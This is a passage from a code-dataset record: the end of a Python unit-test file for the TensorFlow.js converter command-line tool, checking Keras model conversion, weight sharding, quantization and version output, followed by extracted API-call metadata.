self.assertEqual(model_json, model_2_json)\n\n def testVersion(self):\n process = subprocess.Popen(\n ['tensorflowjs_converter', '--version'],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n stdout, _ = process.communicate()\n self.assertEqual(0, process.returncode)\n self.assertIn(\n tf.compat.as_bytes('tensorflowjs %s' % tfjs.__version__),\n tf.compat.as_bytes(stdout))\n\n process = subprocess.Popen(\n ['tensorflowjs_converter', '-v'],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n stdout, _ = process.communicate()\n self.assertEqual(0, process.returncode)\n self.assertIn(\n tf.compat.as_bytes('tensorflowjs %s' % tfjs.__version__),\n tf.compat.as_bytes(stdout))\n\n\nclass ConvertTfKerasSavedModelTest(tf.test.TestCase):\n\n def setUp(self):\n super(ConvertTfKerasSavedModelTest, self).setUp()\n self._tmp_dir = tempfile.mkdtemp()\n\n def tearDown(self):\n if os.path.isdir(self._tmp_dir):\n shutil.rmtree(self._tmp_dir)\n super(ConvertTfKerasSavedModelTest, self).tearDown()\n\n def _createSimpleSequentialModel(self):\n model = keras.Sequential()\n model.add(keras.layers.Reshape([2, 3], input_shape=[6]))\n model.add(keras.layers.LSTM(10))\n model.add(keras.layers.Dense(1, activation='sigmoid'))\n return model\n\n def _createNestedSequentialModel(self):\n model = keras.Sequential()\n model.add(keras.layers.Dense(6, input_shape=[10], activation='relu'))\n model.add(self._createSimpleSequentialModel())\n return model\n\n def _createFunctionalModelWithWeights(self):\n input1 = keras.Input(shape=[8])\n input2 = keras.Input(shape=[10])\n y = keras.layers.Concatenate()([input1, input2])\n y = keras.layers.Dense(4, activation='softmax')(y)\n model = keras.Model([input1, input2], y)\n return model\n\n def testConvertTfKerasNestedSequentialSavedModelIntoTfjsFormat(self):\n with tf.Graph().as_default(), tf.compat.v1.Session():\n x = np.random.randn(8, 10)\n\n # 1. Run the model.predict(), store the result. Then saved the model\n # as a SavedModel.\n model = self._createNestedSequentialModel()\n y = model.predict(x)\n\n keras.experimental.export_saved_model(model, self._tmp_dir)\n\n # 2. Convert the keras saved model to tfjs format.\n tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')\n # Implicit value of --output_format: tfjs_layers_model\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'keras_saved_model',\n self._tmp_dir, tfjs_output_dir\n ])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n model_json_path = os.path.join(tfjs_output_dir, 'model.json')\n self.assertTrue(os.path.isfile(model_json_path))\n\n # 3. Convert the tfjs model to keras h5 format.\n new_h5_path = os.path.join(self._tmp_dir, 'new_h5.h5')\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',\n '--output_format', 'keras', model_json_path, new_h5_path])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n self.assertTrue(os.path.isfile(new_h5_path))\n\n # 4. Load the model back and assert on the equality of the predict\n # results.\n model_prime = keras.models.load_model(new_h5_path)\n new_y = model_prime.predict(x)\n self.assertAllClose(y, new_y)\n\n def testConvertTfKerasFunctionalSavedModelIntoTfjsFormat(self):\n with tf.Graph().as_default(), tf.compat.v1.Session():\n x1 = np.random.randn(4, 8)\n x2 = np.random.randn(4, 10)\n\n # 1. Run the model.predict(), store the result. Then saved the model\n # as a SavedModel.\n model = self._createFunctionalModelWithWeights()\n y = model.predict([x1, x2])\n\n keras.experimental.export_saved_model(model, self._tmp_dir)\n\n # 2. Convert the keras saved model to tfjs format.\n tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')\n # Use explicit --output_format value: tfjs_layers_model\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'keras_saved_model',\n '--output_format', 'tfjs_layers_model',\n self._tmp_dir, tfjs_output_dir\n ])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n model_json_path = os.path.join(tfjs_output_dir, 'model.json')\n self.assertTrue(os.path.isfile(model_json_path))\n\n # 3. Convert the tfjs model to keras h5 format.\n new_h5_path = os.path.join(self._tmp_dir, 'new_h5.h5')\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',\n '--output_format', 'keras', model_json_path, new_h5_path])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n self.assertTrue(os.path.isfile(new_h5_path))\n\n # 4. Load the model back and assert on the equality of the predict\n # results.\n model_prime = keras.models.load_model(new_h5_path)\n new_y = model_prime.predict([x1, x2])\n self.assertAllClose(y, new_y)\n\n def testUsingIncorrectKerasSavedModelRaisesError(self):\n with tf.Graph().as_default(), tf.compat.v1.Session():\n x = np.random.randn(8, 10)\n\n # 1. Run the model.predict(), store the result. Then saved the model\n # as a SavedModel.\n model = self._createNestedSequentialModel()\n y = model.predict(x)\n\n keras.experimental.export_saved_model(model, self._tmp_dir)\n\n # 2. Convert the keras saved model to tfjs format.\n tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')\n # Use incorrect --input_format value: keras\n process = subprocess.Popen(\n [\n 'tensorflowjs_converter', '--input_format', 'keras',\n self._tmp_dir, tfjs_output_dir\n ],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n _, stderr = process.communicate()\n self.assertIn(\n b'Expected path to point to an HDF5 file, '\n b'but it points to a directory', tf.compat.as_bytes(stderr))\n\n def testConvertTfjsLayersModelIntoShardedWeights(self):\n with tf.Graph().as_default(), tf.compat.v1.Session():\n x = np.random.randn(8, 10)\n\n # 1. Run the model.predict(), store the result. Then saved the model\n # as a SavedModel.\n model = self._createNestedSequentialModel()\n y = model.predict(x)\n\n weights = model.get_weights()\n total_weight_bytes = sum(np.size(w) for w in weights) * 4\n\n keras.experimental.export_saved_model(model, self._tmp_dir)\n\n # 2. Convert the keras saved model to tfjs_layers_model format.\n tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')\n # Implicit value of --output_format: tfjs_layers_model\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'keras_saved_model',\n self._tmp_dir, tfjs_output_dir\n ])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n # 3. Convert the tfjs_layers_model to another tfjs_layers_model,\n # with sharded weights.\n weight_shard_size_bytes = int(total_weight_bytes * 0.3)\n # Due to the shard size, there ought to be 4 shards after conversion.\n sharded_model_dir = os.path.join(self._tmp_dir, 'tfjs_sharded')\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',\n '--output_format', 'tfjs_layers_model',\n '--weight_shard_size_bytes', str(weight_shard_size_bytes),\n os.path.join(tfjs_output_dir, 'model.json'), sharded_model_dir\n ])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n # 4. Check the sharded weight files and their sizes.\n weight_files = sorted(\n glob.glob(os.path.join(sharded_model_dir, 'group*.bin')))\n self.assertEqual(len(weight_files), 4)\n weight_file_sizes = [os.path.getsize(f) for f in weight_files]\n self.assertEqual(sum(weight_file_sizes), total_weight_bytes)\n self.assertEqual(weight_file_sizes[0], weight_file_sizes[1])\n self.assertEqual(weight_file_sizes[0], weight_file_sizes[2])\n self.assertLess(weight_file_sizes[3], weight_file_sizes[0])\n\n # 5. Convert the sharded tfjs_layers_model back into a keras h5 file.\n new_h5_path = os.path.join(self._tmp_dir, 'new_h5.h5')\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',\n os.path.join(sharded_model_dir, 'model.json'), new_h5_path\n ])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n with tf.Graph().as_default(), tf.compat.v1.Session():\n # 6. Load the keras model and check the predict() output is close to\n # before.\n new_model = keras.models.load_model(new_h5_path)\n new_y = new_model.predict(x)\n self.assertAllClose(new_y, y)\n\n def testConvertTfjsLayersModelWithQuantization(self):\n with tf.Graph().as_default(), tf.compat.v1.Session():\n x = np.random.randn(8, 10)\n\n # 1. Run the model.predict(), store the result. Then saved the model\n # as a SavedModel.\n model = self._createNestedSequentialModel()\n y = model.predict(x)\n\n weights = model.get_weights()\n total_weight_bytes = sum(np.size(w) for w in weights) * 4\n\n keras.experimental.export_saved_model(model, self._tmp_dir)\n\n # 2. Convert the keras saved model to tfjs_layers_model format.\n tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')\n # Implicit value of --output_format: tfjs_layers_model\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'keras_saved_model',\n self._tmp_dir, tfjs_output_dir\n ])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n # 3. Convert the tfjs_layers_model to another tfjs_layers_model,\n # with uint16 quantization.\n weight_shard_size_bytes = int(total_weight_bytes * 0.3)\n # Due to the shard size, there ought to be 4 shards after conversion.\n sharded_model_dir = os.path.join(self._tmp_dir, 'tfjs_sharded')\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',\n '--output_format', 'tfjs_layers_model',\n '--quantization_bytes', '2',\n os.path.join(tfjs_output_dir, 'model.json'), sharded_model_dir\n ])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n # 4. Check the quantized weight file and its size.\n weight_files = sorted(\n glob.glob(os.path.join(sharded_model_dir, 'group*.bin')))\n self.assertEqual(len(weight_files), 1)\n weight_file_size = os.path.getsize(weight_files[0])\n # The size of the weight file should reflect the uint16 quantization.\n self.assertEqual(weight_file_size, total_weight_bytes // 2)\n\n\n def testConvertTfjsLayersModelToTfjsGraphModel(self):\n x = np.random.randn(8, 10)\n\n # 1. Create a model for testing.\n model = keras.Sequential()\n model.add(keras.layers.Dense(10, activation='relu', input_shape=[4]))\n model.add(keras.layers.Dense(1, activation='sigmoid'))\n\n h5_path = os.path.join(self._tmp_dir, 'model.h5')\n model.save(h5_path)\n\n # 2. Convert the keras saved model to tfjs_layers_model format.\n layers_model_output_dir = os.path.join(self._tmp_dir, 'tfjs_layers')\n # Implicit value of --output_format: tfjs_layers_model\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'keras',\n h5_path, layers_model_output_dir\n ])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n # 3. Convert the tfjs_layers_model to another tfjs_graph_model.\n graph_model_dir = os.path.join(self._tmp_dir, 'tfjs_graph')\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',\n '--output_format', 'tfjs_graph_model',\n os.path.join(layers_model_output_dir, 'model.json'), graph_model_dir\n ])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n # 4. Check the model.json and weight file and its size.\n self.assertTrue(os.path.isfile(os.path.join(graph_model_dir, 'model.json')))\n weight_files = sorted(\n glob.glob(os.path.join(graph_model_dir, 'group*.bin')))\n self.assertEqual(len(weight_files), 1)\n\n\nif __name__ == '__main__':\n tf.test.main()\n"},"apis":{"kind":"list like","value":["tensorflow.python.eager.def_function.function","tensorflow.keras.layers.Dense","tensorflow.keras.models.load_model","tensorflow.keras.experimental.export_saved_model","tensorflow.compat.as_bytes","tensorflow.python.ops.variables.Variable","tensorflow.compat.v1.Session","tensorflow.compat.v1.global_variables_initializer","tensorflow.compat.v1.placeholder","tensorflow.keras.layers.Input","tensorflow.Graph","tensorflow.compat.v1.saved_model.builder.SavedModelBuilder","tensorflow.keras.layers.Reshape","tensorflow.keras.Sequential","tensorflow_hub.create_module_spec","tensorflow.python.training.tracking.tracking.AutoTrackable","tensorflow.python.saved_model.save.save","subprocess.Popen","tensorflow.compat.v1.saved_model.signature_def_utils.predict_signature_def","os.path.isdir","tensorflow.keras.models.Model","tensorflow.compat.v1.nn.softmax","os.path.getsize","tensorflow_hub.Module","tensorflow.Variable","numpy.size","tensorflowjs.converters.save_keras_model","os.path.isfile","tensorflow.keras.layers.LSTM","os.path.dirname","tempfile.mkdtemp","tensorflow.compat.v1.constant","tensorflow.keras.Input","numpy.random.randn","tensorflow.compat.v1.name_scope","tensorflow.compat.v1.matmul","tensorflow.compat.v1.get_variable","tensorflow.keras.layers.Concatenate","os.path.join","tensorflow.python.framework.constant_op.constant","tensorflowjs.__version__.count","tensorflow.test.main","json.load","shutil.rmtree","tensorflow.keras.Model","tensorflow_hub.add_signature"],"string":"[\n \"tensorflow.python.eager.def_function.function\",\n \"tensorflow.keras.layers.Dense\",\n \"tensorflow.keras.models.load_model\",\n \"tensorflow.keras.experimental.export_saved_model\",\n \"tensorflow.compat.as_bytes\",\n \"tensorflow.python.ops.variables.Variable\",\n \"tensorflow.compat.v1.Session\",\n \"tensorflow.compat.v1.global_variables_initializer\",\n \"tensorflow.compat.v1.placeholder\",\n \"tensorflow.keras.layers.Input\",\n \"tensorflow.Graph\",\n \"tensorflow.compat.v1.saved_model.builder.SavedModelBuilder\",\n \"tensorflow.keras.layers.Reshape\",\n \"tensorflow.keras.Sequential\",\n \"tensorflow_hub.create_module_spec\",\n \"tensorflow.python.training.tracking.tracking.AutoTrackable\",\n \"tensorflow.python.saved_model.save.save\",\n \"subprocess.Popen\",\n \"tensorflow.compat.v1.saved_model.signature_def_utils.predict_signature_def\",\n \"os.path.isdir\",\n \"tensorflow.keras.models.Model\",\n \"tensorflow.compat.v1.nn.softmax\",\n \"os.path.getsize\",\n \"tensorflow_hub.Module\",\n \"tensorflow.Variable\",\n \"numpy.size\",\n \"tensorflowjs.converters.save_keras_model\",\n \"os.path.isfile\",\n \"tensorflow.keras.layers.LSTM\",\n \"os.path.dirname\",\n \"tempfile.mkdtemp\",\n \"tensorflow.compat.v1.constant\",\n \"tensorflow.keras.Input\",\n \"numpy.random.randn\",\n \"tensorflow.compat.v1.name_scope\",\n \"tensorflow.compat.v1.matmul\",\n \"tensorflow.compat.v1.get_variable\",\n \"tensorflow.keras.layers.Concatenate\",\n \"os.path.join\",\n \"tensorflow.python.framework.constant_op.constant\",\n \"tensorflowjs.__version__.count\",\n \"tensorflow.test.main\",\n \"json.load\",\n \"shutil.rmtree\",\n \"tensorflow.keras.Model\",\n \"tensorflow_hub.add_signature\"\n]"},"extract_api":{"kind":"string","value":"[((1826, 1850), 'tensorflow.keras.layers.Input', 'keras.layers.Input', (['(3,)'], {}), '((3,))\\n', (1844, 1850), False, 'from tensorflow import keras\\n'), ((2177, 2236), 'tensorflow.keras.models.Model', 'keras.models.Model', ([], {'inputs': '[input_tensor]', 'outputs': '[output]'}), '(inputs=[input_tensor], outputs=[output])\\n', (2195, 2236), False, 'from tensorflow import keras\\n'), ((2622, 2632), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\\n', (2630, 2632), True, 'import tensorflow as tf\\n'), ((3916, 3952), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(1.0)'], {'shape': '[1]'}), '(1.0, shape=[1])\\n', (3936, 3952), False, 'from tensorflow.python.framework import constant_op\\n'), ((3961, 3985), 'tensorflow.python.training.tracking.tracking.AutoTrackable', 'tracking.AutoTrackable', ([], {}), '()\\n', (3983, 3985), False, 'from tensorflow.python.training.tracking import tracking\\n'), ((3998, 4021), 'tensorflow.python.ops.variables.Variable', 'variables.Variable', (['(3.0)'], {}), '(3.0)\\n', (4016, 4021), False, 'from tensorflow.python.ops import variables\\n'), ((4033, 4056), 'tensorflow.python.ops.variables.Variable', 'variables.Variable', (['(2.0)'], {}), '(2.0)\\n', (4051, 4056), False, 'from tensorflow.python.ops import variables\\n'), ((4067, 4121), 'tensorflow.python.eager.def_function.function', 'def_function.function', (['(lambda x: root.v1 * root.v2 * x)'], {}), '(lambda x: root.v1 * root.v2 * x)\\n', (4088, 4121), False, 'from tensorflow.python.eager import def_function\\n'), ((4178, 4208), 'tensorflow.python.saved_model.save.save', 'save', (['root', 'save_path', 'to_save'], {}), '(root, save_path, to_save)\\n', (4182, 4208), False, 'from tensorflow.python.saved_model.save import save\\n'), ((4580, 4590), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\\n', (4588, 4590), True, 'import tensorflow as tf\\n'), ((33845, 33859), 'tensorflow.test.main', 'tf.test.main', ([], {}), '()\\n', (33857, 33859), True, 'import tensorflow as tf\\n'), ((1863, 1986), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(4)'], {'use_bias': '(True)', 'kernel_initializer': '\"\"\"ones\"\"\"', 'bias_initializer': '\"\"\"zeros\"\"\"', 'name': \"(layer_name_prefix + '1')\"}), \"(4, use_bias=True, kernel_initializer='ones',\\n bias_initializer='zeros', name=layer_name_prefix + '1')\\n\", (1881, 1986), False, 'from tensorflow import keras\\n'), ((2039, 2138), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(2)'], {'use_bias': '(False)', 'kernel_initializer': '\"\"\"ones\"\"\"', 'name': \"(layer_name_prefix + '2')\"}), \"(2, use_bias=False, kernel_initializer='ones', name=\\n layer_name_prefix + '2')\\n\", (2057, 2138), False, 'from tensorflow import keras\\n'), ((4450, 4473), 'tensorflow.Variable', 'tf.Variable', (['[2.0, 4.0]'], {}), '([2.0, 4.0])\\n', (4461, 4473), True, 'import tensorflow as tf\\n'), ((4482, 4524), 'tensorflow.compat.v1.placeholder', 'tf.compat.v1.placeholder', ([], {'dtype': 'tf.float32'}), '(dtype=tf.float32)\\n', (4506, 4524), True, 'import tensorflow as tf\\n'), ((4529, 4571), 'tensorflow_hub.add_signature', 'hub.add_signature', ([], {'inputs': 'x', 'outputs': '(x * w)'}), '(inputs=x, outputs=x * w)\\n', (4546, 4571), True, 'import tensorflow_hub as hub\\n'), ((4629, 4669), 'tensorflow_hub.create_module_spec', 'hub.create_module_spec', (['double_module_fn'], {}), '(double_module_fn)\\n', (4651, 4669), True, 'import tensorflow_hub as hub\\n'), ((4678, 4694), 'tensorflow_hub.Module', 'hub.Module', (['spec'], {}), '(spec)\\n', (4688, 4694), True, 'import tensorflow_hub as hub\\n'), ((4725, 4758), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {'graph': 'graph'}), '(graph=graph)\\n', (4745, 4758), True, 'import tensorflow as tf\\n'), ((5014, 5032), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\\n', (5030, 5032), False, 'import tempfile\\n'), ((5062, 5111), 'os.path.join', 'os.path.join', (['cls.class_tmp_dir', '\"\"\"tf_saved_model\"\"\"'], {}), \"(cls.class_tmp_dir, 'tf_saved_model')\\n\", (5074, 5111), False, 'import os\\n'), ((5144, 5196), 'os.path.join', 'os.path.join', (['cls.class_tmp_dir', '\"\"\"tf_saved_model_v1\"\"\"'], {}), \"(cls.class_tmp_dir, 'tf_saved_model_v1')\\n\", (5156, 5196), False, 'import os\\n'), ((5369, 5417), 'os.path.join', 'os.path.join', (['cls.class_tmp_dir', '\"\"\"tf_hub_module\"\"\"'], {}), \"(cls.class_tmp_dir, 'tf_hub_module')\\n\", (5381, 5417), False, 'import os\\n'), ((5510, 5542), 'shutil.rmtree', 'shutil.rmtree', (['cls.class_tmp_dir'], {}), '(cls.class_tmp_dir)\\n', (5523, 5542), False, 'import shutil\\n'), ((5923, 5941), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\\n', (5939, 5941), False, 'import tempfile\\n'), ((6013, 6041), 'os.path.isdir', 'os.path.isdir', (['self._tmp_dir'], {}), '(self._tmp_dir)\\n', (6026, 6041), False, 'import os\\n'), ((9021, 9192), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter', '--input_format', 'nonsensical_format', self.\\n _tmp_dir, self._tmp_dir]\"], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), \"(['tensorflowjs_converter', '--input_format',\\n 'nonsensical_format', self._tmp_dir, self._tmp_dir], stdout=subprocess.\\n PIPE, stderr=subprocess.PIPE)\\n\", (9037, 9192), False, 'import subprocess\\n'), ((9452, 9549), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter']\"], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), \"(['tensorflowjs_converter'], stdout=subprocess.PIPE, stderr\\n =subprocess.PIPE)\\n\", (9468, 9549), False, 'import subprocess\\n'), ((15253, 15280), 'os.path.join', 'os.path.join', (['self._tmp_dir'], {}), '(self._tmp_dir)\\n', (15265, 15280), False, 'import os\\n'), ((15295, 15463), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter', '--input_format', 'tf_saved_model',\\n '--output_format', 'tfjs_graph_model', self.tf_saved_model_v1_dir,\\n output_dir]\"], {}), \"(['tensorflowjs_converter', '--input_format',\\n 'tf_saved_model', '--output_format', 'tfjs_graph_model', self.\\n tf_saved_model_v1_dir, output_dir])\\n\", (15311, 15463), False, 'import subprocess\\n'), ((16083, 16110), 'os.path.join', 'os.path.join', (['self._tmp_dir'], {}), '(self._tmp_dir)\\n', (16095, 16110), False, 'import os\\n'), ((16125, 16237), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter', '--input_format', 'tf_hub', self.\\n tf_hub_module_dir, output_dir]\"], {}), \"(['tensorflowjs_converter', '--input_format', 'tf_hub',\\n self.tf_hub_module_dir, output_dir])\\n\", (16141, 16237), False, 'import subprocess\\n'), ((16915, 16942), 'os.path.join', 'os.path.join', (['self._tmp_dir'], {}), '(self._tmp_dir)\\n', (16927, 16942), False, 'import os\\n'), ((16957, 17122), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter', '--input_format', 'tf_saved_model',\\n '--output_format', 'tfjs_graph_model', self.tf_saved_model_dir, output_dir]\"], {}), \"(['tensorflowjs_converter', '--input_format',\\n 'tf_saved_model', '--output_format', 'tfjs_graph_model', self.\\n tf_saved_model_dir, output_dir])\\n\", (16973, 17122), False, 'import subprocess\\n'), ((18336, 18363), 'os.path.join', 'os.path.join', (['self._tmp_dir'], {}), '(self._tmp_dir)\\n', (18348, 18363), False, 'import os\\n'), ((18378, 18490), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter', '--input_format', 'tf_hub', self.\\n tf_hub_module_dir, output_dir]\"], {}), \"(['tensorflowjs_converter', '--input_format', 'tf_hub',\\n self.tf_hub_module_dir, output_dir])\\n\", (18394, 18490), False, 'import subprocess\\n'), ((19283, 19334), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"keras_h5\"\"\"', '\"\"\"model.h5\"\"\"'], {}), \"(self._tmp_dir, 'keras_h5', 'model.h5')\\n\", (19295, 19334), False, 'import os\\n'), ((19560, 19659), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter', '--input_format', 'keras', h5_path, self._tmp_dir]\"], {}), \"(['tensorflowjs_converter', '--input_format', 'keras',\\n h5_path, self._tmp_dir])\\n\", (19576, 19659), False, 'import subprocess\\n'), ((19825, 19866), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"model_2.h5\"\"\"'], {}), \"(self._tmp_dir, 'model_2.h5')\\n\", (19837, 19866), False, 'import os\\n'), ((20632, 20683), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"keras_h5\"\"\"', '\"\"\"model.h5\"\"\"'], {}), \"(self._tmp_dir, 'keras_h5', 'model.h5')\\n\", (20644, 20683), False, 'import os\\n'), ((20909, 21008), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter', '--input_format', 'keras', h5_path, self._tmp_dir]\"], {}), \"(['tensorflowjs_converter', '--input_format', 'keras',\\n h5_path, self._tmp_dir])\\n\", (20925, 21008), False, 'import subprocess\\n'), ((21455, 21565), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter', '--version']\"], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), \"(['tensorflowjs_converter', '--version'], stdout=subprocess\\n .PIPE, stderr=subprocess.PIPE)\\n\", (21471, 21565), False, 'import subprocess\\n'), ((21804, 21906), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter', '-v']\"], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), \"(['tensorflowjs_converter', '-v'], stdout=subprocess.PIPE,\\n stderr=subprocess.PIPE)\\n\", (21820, 21906), False, 'import subprocess\\n'), ((22281, 22299), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\\n', (22297, 22299), False, 'import tempfile\\n'), ((22330, 22358), 'os.path.isdir', 'os.path.isdir', (['self._tmp_dir'], {}), '(self._tmp_dir)\\n', (22343, 22358), False, 'import os\\n'), ((22507, 22525), 'tensorflow.keras.Sequential', 'keras.Sequential', ([], {}), '()\\n', (22523, 22525), False, 'from tensorflow import keras\\n'), ((22755, 22773), 'tensorflow.keras.Sequential', 'keras.Sequential', ([], {}), '()\\n', (22771, 22773), False, 'from tensorflow import keras\\n'), ((22977, 22999), 'tensorflow.keras.Input', 'keras.Input', ([], {'shape': '[8]'}), '(shape=[8])\\n', (22988, 22999), False, 'from tensorflow import keras\\n'), ((23013, 23036), 'tensorflow.keras.Input', 'keras.Input', ([], {'shape': '[10]'}), '(shape=[10])\\n', (23024, 23036), False, 'from tensorflow import keras\\n'), ((23157, 23189), 'tensorflow.keras.Model', 'keras.Model', (['[input1, input2]', 'y'], {}), '([input1, input2], y)\\n', (23168, 23189), False, 'from tensorflow import keras\\n'), ((32381, 32403), 'numpy.random.randn', 'np.random.randn', (['(8)', '(10)'], {}), '(8, 10)\\n', (32396, 32403), True, 'import numpy as np\\n'), ((32454, 32472), 'tensorflow.keras.Sequential', 'keras.Sequential', ([], {}), '()\\n', (32470, 32472), False, 'from tensorflow import keras\\n'), ((32621, 32660), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"model.h5\"\"\"'], {}), \"(self._tmp_dir, 'model.h5')\\n\", (32633, 32660), False, 'import os\\n'), ((32784, 32826), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"tfjs_layers\"\"\"'], {}), \"(self._tmp_dir, 'tfjs_layers')\\n\", (32796, 32826), False, 'import os\\n'), ((32900, 33009), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter', '--input_format', 'keras', h5_path,\\n layers_model_output_dir]\"], {}), \"(['tensorflowjs_converter', '--input_format', 'keras',\\n h5_path, layers_model_output_dir])\\n\", (32916, 33009), False, 'import subprocess\\n'), ((33189, 33230), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"tfjs_graph\"\"\"'], {}), \"(self._tmp_dir, 'tfjs_graph')\\n\", (33201, 33230), False, 'import os\\n'), ((2669, 2704), 'tensorflow.compat.v1.name_scope', 'tf.compat.v1.name_scope', (['name_scope'], {}), '(name_scope)\\n', (2692, 2704), True, 'import tensorflow as tf\\n'), ((2716, 2766), 'tensorflow.compat.v1.constant', 'tf.compat.v1.constant', (['[[37.0, -23.0], [1.0, 4.0]]'], {}), '([[37.0, -23.0], [1.0, 4.0]])\\n', (2737, 2766), True, 'import tensorflow as tf\\n'), ((2777, 2821), 'tensorflow.compat.v1.get_variable', 'tf.compat.v1.get_variable', (['\"\"\"w\"\"\"'], {'shape': '[2, 2]'}), \"('w', shape=[2, 2])\\n\", (2802, 2821), True, 'import tensorflow as tf\\n'), ((2832, 2857), 'tensorflow.compat.v1.matmul', 'tf.compat.v1.matmul', (['x', 'w'], {}), '(x, w)\\n', (2851, 2857), True, 'import tensorflow as tf\\n'), ((2873, 2899), 'tensorflow.compat.v1.nn.softmax', 'tf.compat.v1.nn.softmax', (['y'], {}), '(y)\\n', (2896, 2899), True, 'import tensorflow as tf\\n'), ((2973, 3034), 'tensorflow.compat.v1.saved_model.builder.SavedModelBuilder', 'tf.compat.v1.saved_model.builder.SavedModelBuilder', (['save_path'], {}), '(save_path)\\n', (3023, 3034), True, 'import tensorflow as tf\\n'), ((4781, 4824), 'tensorflow.compat.v1.global_variables_initializer', 'tf.compat.v1.global_variables_initializer', ([], {}), '()\\n', (4822, 4824), True, 'import tensorflow as tf\\n'), ((6049, 6077), 'shutil.rmtree', 'shutil.rmtree', (['self._tmp_dir'], {}), '(self._tmp_dir)\\n', (6062, 6077), False, 'import shutil\\n'), ((6178, 6205), 'tensorflowjs.__version__.count', 'tfjs.__version__.count', (['\"\"\".\"\"\"'], {}), \"('.')\\n\", (6200, 6205), True, 'import tensorflowjs as tfjs\\n'), ((6364, 6418), 'tensorflowjs.converters.save_keras_model', 'tfjs.converters.save_keras_model', (['model', 'self._tmp_dir'], {}), '(model, self._tmp_dir)\\n', (6396, 6418), True, 'import tensorflowjs as tfjs\\n'), ((8039, 8061), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\\n', (8059, 8061), True, 'import tensorflow as tf\\n'), ((8157, 8212), 'tensorflowjs.converters.save_keras_model', 'tfjs.converters.save_keras_model', (['model1', 'self._tmp_dir'], {}), '(model1, self._tmp_dir)\\n', (8189, 8212), True, 'import tensorflowjs as tfjs\\n'), ((8298, 8320), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\\n', (8318, 8320), True, 'import tensorflow as tf\\n'), ((9364, 9390), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (['stderr'], {}), '(stderr)\\n', (9382, 9390), True, 'import tensorflow as tf\\n'), ((9709, 9735), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (['stderr'], {}), '(stderr)\\n', (9727, 9735), True, 'import tensorflow as tf\\n'), ((9819, 9841), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\\n', (9839, 9841), True, 'import tensorflow as tf\\n'), ((9958, 10009), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"keras_h5\"\"\"', '\"\"\"model.h5\"\"\"'], {}), \"(self._tmp_dir, 'keras_h5', 'model.h5')\\n\", (9970, 10009), False, 'import os\\n'), ((10081, 10180), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter', '--input_format', 